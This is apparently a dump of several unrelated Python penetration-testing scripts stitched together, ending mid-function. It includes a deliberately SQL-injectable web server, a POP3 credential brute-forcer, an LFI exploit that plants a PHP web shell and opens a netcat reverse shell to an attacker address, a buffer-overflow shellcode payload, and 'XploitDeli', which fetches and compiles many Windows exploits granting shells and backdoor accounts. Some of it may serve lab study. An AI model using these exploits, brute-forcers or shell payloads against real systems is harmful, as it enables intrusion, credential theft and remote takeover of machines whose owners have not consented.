new_packet += f"\n<h6>{i[0]} {i[1]}</h6>"
results = new_packet
packet = f"""
<title>Vulnerable SQL Web Server</title>
<h1>Horrific Looking Search Page</h1>
This is a horrible looking search page. It is meant to be vulnerable to SQL Injections.
<form action="http://{self.externalip}:{self.port}">
Where would you like to go? <input type="text" placeholder="Your Search" name="search">
<input type="submit" value="Search">
<h4>Sql Query: {sqlquery}</h4>
</form>
{results}
"""
return packet
def listen(self):
if self.valid:
print("[+] Server is listening For Connections.....")
if self.externalip != self.ip:
print(f"[+] Also listening on(for external connections): {self.externalip}:{self.port}")
print("")
while True:
try:
ipaddr = ""
self.server.listen()
conn, ip = self.server.accept()
self.packet = self.gen_packet()
msg = conn.recv(1024).decode()
item = 0
msg_split = msg.split()
for i in msg_split:
if 'x-forwarded-for' in i.lower():
ipaddr = msg_split[item + 1]
break
item += 1
if ipaddr == "":
ipaddr = ip[0]
print(f"[+] {ipaddr} has connected.")
handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
handler.start()
except:
pass
def simplify_str(self, item):
return item.replace("+", " ").replace("%3C", "<").replace("%3E", ">").replace(
"%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B",
"+").replace("%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ","
).replace("%3B", ";").replace("%20", " ").replace("%3F", "?").replace("%5C", "\\"
).replace("%7B", "{").replace("%7D", "}").replace("%24", "$").replace("%0D", "\n"
).replace("%0A", " ").replace("%40","@").replace("%25", "%")
def search(self, query):
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
cursor.execute(query)
item = cursor.fetchall()
if len(item) >= 1:
return item
else:
return [("No Results.", "")]
def handler(self, conn, msg, ip):
try:
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
if "/?search=" in msg.split()[1]:
try:
search = self.simplify_str(str(msg).split()[1].split("=")[1]).lower()
results = ""
if search.strip() == "":
conn.send(self.packet.encode())
else:
query = f"select item, price from items where item = '{search}'"
results = self.search(query)
packet = self.gen_packet(sqlquery=query, results=results)
conn.send(packet.encode())
except Exception as e:
print(f"[+] Error: {e}")
packet = self.gen_packet(sqlquery=query, results=results)
conn.send(packet.encode())
else:
conn.send(self.packet.encode())
conn.close()
except:
pass
e = WebServer()
e.listen()
| 46.840491 | 158 | 0.424394 |
cybersecurity-penetration-testing | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
print" <Entity Type=\"maltego."+entity+"\">"
print" <Value>"+value+"</Value>"
print" <AdditionalFields>"
for value, item in addvalues.iteritems():
print" <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
print" </AdditionalFields>"
print" </Entity>"
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
| 24.347826 | 104 | 0.671821 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
def dnsQRTest(pkt):
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
if rcode == 3:
print '[!] Name request lookup failed: ' + qname
return True
else:
return False
def main():
unAnsReqs = 0
pkts = rdpcap('domainFlux.pcap')
for pkt in pkts:
if dnsQRTest(pkt):
unAnsReqs = unAnsReqs + 1
print '[!] '+str(unAnsReqs)+' Total Unanswered Name Requests'
if __name__ == '__main__':
main()
| 21.892857 | 65 | 0.557813 |
cybersecurity-penetration-testing | import xlsxwriter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.04
__description__ = 'Write XSLX file.'
ALPHABET = [chr(i) for i in range(ord('A'), ord('Z') + 1)]
def writer(output, headers, output_data, **kwargs):
"""
The writer function writes excel output for the framework
:param output: the output filename for the excel spreadsheet
:param headers: the name of the spreadsheet columns
:param output_data: the data to be written to the excel spreadsheet
:return: Nothing
"""
wb = xlsxwriter.Workbook(output)
if headers is None:
print '[-] Received empty headers... \n[-] Skipping writing output.'
return
if len(headers) <= 26:
title_length = ALPHABET[len(headers) - 1]
else:
title_length = 'Z'
ws = addWorksheet(wb, title_length)
if 'recursion' in kwargs.keys():
for i, data in enumerate(output_data):
if i > 0:
ws = addWorksheet(wb, title_length)
cell_length = len(data)
tmp = []
for dictionary in data:
tmp.append(
[unicode(dictionary[x]) if x in dictionary.keys() else '' for x in headers]
)
ws.add_table('A3:' + title_length + str(3 + cell_length),
{'data': tmp, 'columns': [{'header': x} for x in headers]})
else:
cell_length = len(output_data)
tmp = []
for data in output_data:
tmp.append([unicode(data[x]) if x in data.keys() else '' for x in headers])
ws.add_table('A3:' + title_length + str(3 + cell_length),
{'data': tmp, 'columns': [{'header': x} for x in headers]})
wb.close()
def addWorksheet(wb, length, name=None):
"""
The addWorksheet function creates a new formatted worksheet in the workbook
:param wb: The workbook object
:param length: The range of rows to merge
:param name: The name of the worksheet
:return: ws, the worksheet
"""
title_format = wb.add_format({'bold': True, 'font_color': 'black',
'bg_color': 'white', 'font_size': 30,
'font_name': 'Arial', 'align': 'center'})
ws = wb.add_worksheet(name)
ws.merge_range('A1:' + length + '1', 'XYZ Corp', title_format)
ws.merge_range('A2:' + length + '2', 'Case ####', title_format)
return ws | 33.138889 | 95 | 0.561661 |
PenetrationTestingScripts | #coding=utf-8
import time
from printers import printPink,printGreen
import threading
from multiprocessing.dummy import Pool
import poplib
def pop3_Connection(ip,username,password,port):
try:
pp = poplib.POP3(ip)
#pp.set_debuglevel(1)
pp.user(username)
pp.pass_(password)
(mailCount,size) = pp.stat()
pp.quit()
if mailCount:
lock.acquire()
printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
lock.release()
except Exception,e:
print e
lock.acquire()
print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
lock.release()
pass
def pop3_l(ip,port):
try:
d=open('conf/pop3.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
pop3_Connection(ip,username,password,port)
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def pop_main(ipdict,threads):
printPink("crack pop now...")
print "[*] start crack pop %s" % time.ctime()
starttime=time.time()
global lock
lock = threading.Lock()
global result
result=[]
pool=Pool(threads)
for ip in ipdict['pop3']:
pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop pop serice %s" % time.ctime()
print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
return result | 28.360656 | 109 | 0.559777 |
cybersecurity-penetration-testing | #!/usr/bin/env python
import sys
from scapy.all import *
targetRange = sys.argv[1]
targetPort = sys.argv[2]
conf.verb=0
p=IP(dst=targetRange)/TCP(dport=int(targetPort), flags="S")
ans,unans=sr(p, timeout=9)
for answers in ans:
if answers[1].flags == 2:
print answers[1].src
| 16.882353 | 59 | 0.653465 |
Hands-On-Penetration-Testing-with-Python | #unset QT_QPA_PLATFORM
#sudo echo "export QT_QPA_PLATFORM=offscreen" >> /etc/environment
from bs4 import BeautifulSoup
import requests
import multiprocessing as mp
from selenium import webdriver
import time
import datetime
import os
import sys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
class LFT_RFI_automate():
def __init__(self,target="",base=""):
try:
print("\n\n\n LFI EXPLOIT BY KHAN \n\n\n")
self.target=sys.argv[2]
self.base=sys.argv[1]
self.target_link=sys.argv[3]
self.v_param=sys.argv[4]
self.att_ip=sys.argv[9]
self.att_port=sys.argv[10]
if sys.argv[11] == str(1):
self.add_param=sys.argv[12]
self.server_domain=""
if sys.argv[5] == str(0):
self.login=False
else :
self.login=True
if self.login :
self.email_field=sys.argv[6].split(":")[0]
self.email=sys.argv[6].split(":")[1]
self.password_field=sys.argv[7].split(":")[0]
self.password=sys.argv[7].split(":")[1]
self.login_button=sys.argv[8]
self.server_domain=self.base
except Exception as ex:
print("\n\nException caught : " +str(ex))
print('\n\nExample : python LFI_RFI.py <target ip> <target Base/Login URL> <target Vulnetable URL> <Target Vul parameter> <Login required (1/0)> <Login field name:Login field value> <Password field name:Password field value> <Login Button name> <Attacker IP> <Attacker Lister PORT> <Add params required (1/0)> <add_param_name1=add_param_value1,add_param_name2=add_param_value2>')
print('\n\nExample : python LFI_RFI.py 192.168.1.102 http://192.168.1.102/dvwa/login.php http://192.168.1.102/dvwa/vulnerabilities/fi/ page 1 username:admin password:password Login 192.168.1.102 4444 0')
sys.exit()
def send_exp(self,delay,browser,exp_url):
print("Send Exploit STARTED")
time.sleep(delay)
browser.get(exp_url)
browser.save_screenshot('Exploit.png')
print("Send Exploit END")
def start(self):
try:
if self.login :
browser = webdriver.PhantomJS()
browser.get(self.target)
element_username=browser.find_element_by_name(self.email_field);
element_username.clear()
element_username.send_keys(self.email)
element_username.click()
element_password=browser.find_element_by_name(self.password_field);
element_password.clear()
element_password.send_keys(self.password)
element_password.click()
try:
element_submit = WebDriverWait(browser, 2).until(
EC.element_to_be_clickable((By.NAME,self.login_button))
)
time. sleep(2)
element_submit.click()
except Exception as ee:
print("Exception : "+str(ee))
browser.quit()
else:
browser = webdriver.PhantomJS()
browser.get(self.target)
html = browser.page_source
cookie={'domain':self.server_domain,'name': 'security','value':'low',
'path': '/dvwa/','httponly': False, 'secure': False}
#security=low; PHPSESSID=5c6uk2gvq4q9ri9pkmprbvt6u2
browser.add_cookie(cookie)
all_cookies = browser.get_cookies()
soup = BeautifulSoup(html, "html.parser")
anchor_tags=soup.find_all("a")
browser.save_screenshot('screen.png')
print("\n Saved Screen shot Post Login / Firt request")
self.nav_url=self.target_link+"?"+str(self.v_param)+"=<?php echo shell_exec($_GET['cmd']); ?>"
print("Preparing Payload")
os.system("echo '"+str(self.nav_url) +"' > exp.txt")
print("Payload prepared")
print("\n\nOpening Netcat to send payload..... ")
os.system("echo 'nc "+self.base+" 80 < exp.txt' > exp.sh")
os.system("chmod +x exp.sh")
os.system("./exp.sh")
print("Payload sent")
print("Now sending Payload in 5 sec")
exp_url=self.target_link+"?"+str(self.v_param)+"=/var/log/apache2/access.log&cmd=nc "+self.att_ip+" "+self.att_port+" -e /bin/sh"
print("\n\n Exploit to be send : " +str(exp_url))
p=mp.Process(target=self.send_exp,args=(5,browser,exp_url))
p.start()
print("Starting NC")
print("Preparing EXploit to send")
os.system("nc -nlvp 4444")
except Exception as ex:
print(str(ex))
obj=LFT_RFI_automate()
obj.start()
| 36.452174 | 382 | 0.687877 |
PenetrationTestingScripts | import ctypes,sys
import platform
if platform.system()=='Linux' or platform.system()=='Darwin':
class colors:
BLACK = '\033[0;30m'
DARK_GRAY = '\033[1;30m'
LIGHT_GRAY = '\033[0;37m'
BLUE = '\033[0;34m'
LIGHT_BLUE = '\033[1;34m'
GREEN = '\033[0;32m'
LIGHT_GREEN = '\033[1;32m'
CYAN = '\033[0;36m'
LIGHT_CYAN = '\033[1;36m'
RED = '\033[0;31m'
LIGHT_RED = '\033[1;31m'
PURPLE = '\033[0;35m'
LIGHT_PURPLE = '\033[1;35m'
BROWN = '\033[0;33m'
YELLOW = '\033[1;33m'
WHITE = '\033[1;37m'
DEFAULT_COLOR = '\033[00m'
RED_BOLD = '\033[01;31m'
ENDC = '\033[0m'
def printRed(mess):
mess=mess.strip('\r\n')
print colors.RED + mess + colors.ENDC
def printPink(mess):
mess=mess.strip('\r\n')
print colors.BLUE + mess+ colors.ENDC
def printGreen(mess):
mess=mess.strip('\r\n')
print colors.GREEN + mess + colors.ENDC
if platform.system()=='Windows':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
def set_cmd_text_color(color, handle=std_out_handle):
Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return Bool
def resetColor():
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
def printRed(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()
def printPink(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY)
print(mess)
resetColor()
def printGreen(mess):
set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()
| 31.063291 | 82 | 0.584518 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer)<=30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.158',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
| 17.964286 | 54 | 0.596226 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | numberOfEggs = 12
if numberOfEggs < 4:
print('That is not that many eggs.')
elif numberOfEggs < 20:
print('You have quite a few eggs.')
elif numberOfEggs == 144:
print('You have a lot of eggs. Gross!')
else:
print('Eat ALL the eggs!')
| 25.1 | 44 | 0.638462 |
Penetration-Testing-Study-Notes | prefix = "\\x41" * 80
eip = "\\x42" * 4
nop = "\\x90" * (400 - 137)
buf = ""
buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31"
buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68"
buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\xb9\\xdd\\x29\\x7d\\x33"
buf += "\\x3e\\x4f\\xfc\\xa0\\xc1\\x60\\x33\\xa6\\xf3\\x5b\\x3c\\x44\\xa0"
buf += "\\x18\\x91\\xe1\\x45\\x16\\xf4\\x46\\x2f\\xe5\\x76\\xf7\\xda\\xf1"
buf += "\\x22\\x92\\x18\\x90\\xcb\\x32\\x8a\\xed\\x2a\\xd8\\xba\\xb6\\xc6"
buf += "\\x7b\\x9b\\x85\\x96\\x13\\x98\\xd2\\x82\\x42\\xc4\\x84\\xf8\\x1c"
buf += "\\xf8\\x38\\xed\\x80\\x96\\x28\\x5c\\x69\\xee\\xa8\\x34\\xef\\xa8"
buf += "\\xe7\\x48\\x3e\\xab\\x48\\x2e\\x0c\\xac\\xf9\\xed\\x3e\\xcb\\x70"
buf += "\\xa0\\x3a\\xd9\\x03\\xd1\\xf5\\xed\\xb3\\xd6\\x34\\x6d\\x34\\x07"
buf += "\\x9d\\xde\\x3d\\x7a\\xa2\\xe0\\xa3"
payload = prefix + eip + nop + buf
print(payload)
with open('payload.txt', 'w') as f:
hex_content = f.write(payload)
| 44.318182 | 74 | 0.558233 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
###################################################
#
# XploitDeli - written by Justin Ohneiser
# ------------------------------------------------
# This program produces a variety of exploits
# found on exploit-db for immediate use.
#
# Note: options with an asterisk either don't work
# or require compilation on the target.
#
# [Warning]:
# This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
# I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
# functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
# target machines in a lab environment so please only use it against systems for which you have permission!!
#-------------------------------------------------------------------------------------------------------------
# [Modification, Distribution, and Attribution]:
# You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
# worth anything anyway :)
#
# Designed for use in Kali Linux 4.6.0-kali1-686
###################################################
import sys, os, subprocess
# ------------------------------------
# WINDOWS REMOTE
# ------------------------------------
def windows_exploit_suggester():
commands = [
('Downloading...','wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
('Upacking...','unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
('Updating...','./windows-exploit-suggester.py -u'),
('Cleaning up...','rm master.zip; rm -r Windows-Exploit-Suggester-master')
]
if run(commands):
printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
def ms03_026():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
('Compiling...','i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
('Cleaning up...','rm ms03-026.c')
]
if run(commands):
printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")
def ms03_039_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
('Compiling...','i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
('Cleaning up...','rm ms03-039.c')
]
if run(commands):
printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
def ms03_039_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
('Compiling...','i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
('Cleaning up...','rm ms03-039.cpp')
]
if run(commands):
printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")
def ms03_049():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
('Compiling...','i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
('Cleaning up...','rm ms03-049.c')
]
if run(commands):
printGood("ms03-039.exe successfully created\n\t - spawns bind shell on port 5555")
def ms04_007():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
('Unpacking...','tar xvzf ms04-007.tar.gz'),
('Cleaning up...','rm ms04-007.tar.gz')
]
if run(commands):
printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")
def ms04_011_sslbof():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
('Cleaning up...','rm ms04-011.c')
]
if run(commands):
printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")
def ms04_011_lsasarv():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
('Cleaning up...','rm ms04-011.c')
]
if run(commands):
printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")
def ms04_031():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
('Cleaning up...','rm ms04-031.c')
]
if run(commands):
printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")
def ms05_017():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
('Compiling...','i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
('Cleaning up...','rm ms05-017.c')
]
if run(commands):
printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")
def ms05_039():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
('Compiling...','i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
('Cleaning up...','rm ms05-039.c')
]
if run(commands):
printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")
def ms06_040_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
('Cleaning up...','rm ms06-040.c')
]
if run(commands):
printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")
def ms06_040_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
('Fixing...',"sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
('Compiling...','i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
('Cleaning up...','rm ms06-040.c')
]
if run(commands):
printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")
def ms06_070():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
('Fixing...',"sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
('Compiling...','i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
('Cleaning up...','rm ms06-070.c')
]
if run(commands):
printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")
def ms08_067_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
('Compiling...','i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
('Cleaning up...','rm ms08-067.c')
]
if run(commands):
printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")
def ms08_067_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
('Preparing...','chmod 744 ms08-067.py')
]
if run(commands):
printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")
def ms08_067_3():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
('Unpacking...','mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
('Cleaning up...','rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067')
]
if run(commands):
printGood("ms08-067.exe successfully created\n\t")
def ms09_050():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
('Unpacking...','unzip ms09-050.zip'),
('Cleaning up...','rm ms09-050.zip'),
('Compiling...','cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32')
]
if run(commands):
printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")
exploits_windows_remote = [
("windows_exploit_suggester" , windows_exploit_suggester),
("ms03-026" , ms03_026),
("ms03-039 (1)" , ms03_039_1),
("ms03-039 (2)" , ms03_039_2),
("*ms03-049" , ms03_049),
("ms04-007" , ms04_007),
("ms04-011 - ssl bof" , ms04_011_sslbof),
("ms04-011 - lsasarv.dll" , ms04_011_lsasarv),
("ms04-031" , ms04_031),
("ms05-017" , ms05_017),
("ms05-039" , ms05_039),
("*ms06-040 (1)" , ms06_040_1),
("ms06-040 (2)" , ms06_040_2),
("ms06-070" , ms06_070),
("*ms08-067 (1)" , ms08_067_1),
("ms08-067 (2)" , ms08_067_2),
("ms08-067 (3)" , ms08_067_3),
("*ms09-050" , ms09_050)
]
# ------------------------------------
# WINDOWS LOCAL
# ------------------------------------
def windows_privesc_check():
commands = [
('Downloading...','wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
('Unpacking','unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
('Cleaning up...','rm windows-privesc-check.zip; rm -r windows-privesc-check-master')
]
if run(commands):
printGood("windows-privesc-check2.exe successfully created")
def ms04_011_local():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
('Fixing...',"sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
('Cleaning up...','rm ms04-011.c')
]
if run(commands):
printGood("ms04-011.exe successfully created\n\t")
def ms04_019_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
('Fixing...',"sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")
def ms04_019_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t")
def ms04_019_3():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
('Compiling...','i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
('Cleaning up...','rm ms04-019.c')
]
if run(commands):
printGood("ms04-019.exe successfully created\n\t")
def ms04_020():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
('Fixing...',"sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
('Compiling...','i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
('Cleaning up...','rm ms04-020.c')
]
if run(commands):
printGood("ms04-020.exe successfully created\n\t")
def keybd():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1197 -O keybd.c'),
('Compiling...','i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
('Cleaning up...','rm keybd.c')
]
if run(commands):
printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")
def ms05_018():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
('Compiling...','i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
('Cleaning up...','rm ms05-018.c')
]
if run(commands):
printGood("ms05-018.exe successfully created\n\t")
def ms05_055():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
('Compiling...','i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
('Cleaning up...','rm ms05-055.c')
]
if run(commands):
printGood("ms05-055.exe successfuly created\n\t")
def ms06_030():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
('Compiling...','i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
('Cleaning up...','rm ms06-030.c')
]
if run(commands):
printGood("ms06-030.exe successfully created\n\t")
def ms06_049():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
('Compiling...','i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
('Cleaning up...','rm ms06-049.c')
]
if run(commands):
printGood("ms06-049.exe successfully created\n\t")
def spool():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/3220 -O spool.c'),
('Fixing...',"sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
('Compiling...','i686-w64-mingw32-gcc spool.c -o spool.exe'),
('Cleaning up...','rm spool.c')
]
if run(commands):
printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")
def ms08_025():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
('Unpacking...','mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
('Compiling...','cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
('Cleaning up...','rm ms08-025.zip; rm -r ms08-025')
]
if run(commands):
printGood("ms08_025.exe successfully created\n\t")
def netdde():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/21923 -O netdde.c'),
('Fixing...',"sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
('Compiling...','i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
('Cleaning up...','rm netdde.c')
]
if run(commands):
printGood("netdde.exe successfully created\n\t")
def ms10_015():
commands = [
